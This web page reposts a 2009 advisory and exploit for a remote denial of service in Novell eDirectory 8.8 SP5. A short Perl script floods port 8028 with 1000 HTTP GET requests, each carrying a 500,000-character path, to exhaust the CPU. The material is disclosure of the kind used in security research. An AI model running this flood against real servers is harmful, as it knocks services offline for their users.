首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Novell eDirectory 8.8 SP5 Remote Denial of Service Exploit
来源:http://tcc.hellcode.net/ 作者:karak0rsan 发布时间:2009-09-10  

Affected Software:
Novell eDirectory 8.8 SP5

Vulnerability Description:
Novell eDirectory 8.8 SP5 is vulnerable to a denial of service attack.
If a remote attacker sends Unicode strings with Http Request to "8028 port"
("8028" is the default port of Novell eDirectory Dhost Http Server),
the attacker can cause the system to consume %100 of the CPU resources.

Discovered by:
karak0rsan, Hellcode Research

Original Advisory:
http://tcc.hellcode.net/advisories/hellcode-adv003.txt

Exploit:

 - snip-
....

$data = "?" x 500000;

for($i= 0; $i < 1000; $i++)
{
 $sock= new IO::Socket::INET( PeerAddr => "localhost",
 PeerPort => 8028,

 Proto => 'tcp',
 Type => SOCK_STREAM,

 );
 
 print $sock "GET /$data HTTP/1.0\r\n\r\n";
 
 close($sock);
}

...
 - snip -


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·SIDVault 2.0e Windows Universa
·Joomla Component BF Survey Pro
·HTMLDOC 1.8.27 (html File Hand
·Joomla Component TPDugg 1.1 Bl
·Windows Vista/7 SMB2.0 Negotia
·Agoko CMS <= 0.4 Remote Comman
·SMB SRV2.SYS Denial of Service
·Audio Lib Player (m3u File) Bu
·GemStone/S 6.3.1 "stoned" Loca
·FTPShell Client 4.1 RC2 Remote
·Ipswitch WS_FTP 12 Professiona
·Pidgin MSN <= 2.5.8 Remote Cod
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved